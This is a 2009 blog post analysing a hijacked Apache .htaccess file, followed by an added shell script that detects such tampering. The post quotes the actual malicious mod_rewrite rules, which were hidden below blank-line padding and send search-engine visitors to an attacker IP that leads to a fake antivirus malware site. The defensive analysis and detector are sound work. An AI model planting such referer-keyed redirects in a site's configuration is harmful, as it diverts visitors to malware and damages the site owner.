Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic

Posted by on Jan 14, 2009 in Security, Web Development

A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.

I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]

These lines were also preceded by a couple of dozen lines of white space, so that to most people checking .htaccess the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh, to check the file).

Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).

Using a combination of traceroute and the Lynx web browser, I tracked the redirects. The web server located at 89.28.13.201 installs a cookie (visited=1) and also contains a script to redirect to a string of sites – first to worldgreenpeace.cn (link to Google Safe Browsing Info Page), which installs a cookie: soft=1. This site then redirects the browser to the final target destination of bestantivirusfastscan.com (link to Google Safe Browsing Info page), which installs a cookie: av_inst=880147 (an arbitrary ID number – although it seems that 880147 people may have been redirected already). This final site contains malware, which I presume does something nasty, although I felt no inclination to investigate further!

Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly back to normal, receiving the search engine traffic it should.

So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!
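To make that check routine rather than relying on paging through the file by hand, here is an added POSIX shell script (my example, not code from the original post) that scans an .htaccess for the three tell-tale features described above: a long run of blank lines before the first directive, RewriteCond lines that key on HTTP_REFERER matching the big search engines, and a RewriteRule whose target is an absolute URL to a raw IP address. The two sample .htaccess files are constructed inline; the redirect target 192.0.2.10 is a documentation-range placeholder, not the address from the post.

```shell
#!/bin/sh
# Added example: flag referer-conditioned search-engine hijacks in .htaccess.
# Sample files below are constructed for the demonstration.

# Count the blank (whitespace-only) lines before the first directive.
# A large number is the "push the payload below the editor window" trick.
leading_blank_lines() {
    awk 'NF { exit } { n++ } END { print n + 0 }' "$1"
}

# List RewriteCond lines that make a rewrite depend on the Referer header.
referer_conditions() {
    grep -inE '^[[:space:]]*RewriteCond[[:space:]]+%\{HTTP_REFERER\}' "$1"
}

# List RewriteRule lines that send traffic to an absolute URL on a raw IPv4
# address; a legitimate site rewrite almost never looks like this.
external_ip_redirects() {
    grep -inE '^[[:space:]]*RewriteRule[[:space:]].*https?://[0-9]{1,3}(\.[0-9]{1,3}){3}' "$1"
}

# Print findings for one file; return 0 if nothing suspicious, 1 otherwise.
scan_htaccess() {
    f=$1
    findings=0
    pad=$(leading_blank_lines "$f")
    if [ "$pad" -ge 10 ]; then
        echo "  $pad blank lines before the first directive (padding to hide content?)"
        findings=$((findings + 1))
    fi
    # Search engines named in the post; extend the list for your own traffic.
    if referer_conditions "$f" | grep -qiE 'google|aol|msn|altavista|ask|yahoo'; then
        echo "  RewriteCond on HTTP_REFERER matching search engines:"
        referer_conditions "$f" | sed 's/^/    /'
        findings=$((findings + 1))
    fi
    if external_ip_redirects "$f" | grep -q .; then
        echo "  RewriteRule redirecting to a raw IP address:"
        external_ip_redirects "$f" | sed 's/^/    /'
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

# --- constructed samples ---------------------------------------------------
CLEAN=$(mktemp)
BAD=$(mktemp)

# A typical, benign front-controller .htaccess.
cat > "$CLEAN" <<'EOF'
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
EOF

# Hijacked file: 25 empty lines of padding, then a referer-keyed redirect
# to a placeholder IP (192.0.2.10 is reserved for documentation).
printf '%25s' '' | tr ' ' '\n' > "$BAD"
cat >> "$BAD" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://192.0.2.10/in.html?s=xi [R,L]
EOF

for f in "$CLEAN" "$BAD"; do
    echo "== $f"
    if scan_htaccess "$f"; then
        echo "  no findings"
    fi
done
```

To sweep a whole document root over ssh, run it as `find /var/www -name .htaccess -exec sh -c '. ./scan.sh; scan_htaccess "$1"' _ {} \;` (the filename scan.sh is an assumption). Note that the post's own patterns are very loose: `.*ask.*` fires on any referer containing "ask", so the script only reports, and a human still decides whether the rewrite is legitimate.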
